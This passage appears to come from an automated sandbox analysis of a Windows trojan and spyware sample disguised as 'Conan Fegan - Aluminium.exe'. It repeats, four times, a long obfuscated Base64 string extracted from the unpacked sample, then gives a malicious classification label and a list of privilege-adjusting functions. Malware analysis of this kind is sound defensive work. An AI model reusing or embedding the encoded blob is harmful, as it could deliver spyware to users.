'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
                  Source: 0.2.Conan Fegan - Aluminium.exe.960000.0.unpack, frmlogin.csBase64 encoded string: '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
                  Source: 0.0.Conan Fegan - Aluminium.exe.960000.0.unpack, frmlogin.csBase64 encoded string: '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
                  Source: 5.2.Conan Fegan - Aluminium.exe.c20000.1.unpack, frmlogin.csBase64 encoded string: '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
                  Source: 5.0.Conan Fegan - Aluminium.exe.c20000.0.unpack, frmlogin.csBase64 encoded string: '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
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@88/2
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,5_2_0040650A
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,5_2_0040434D
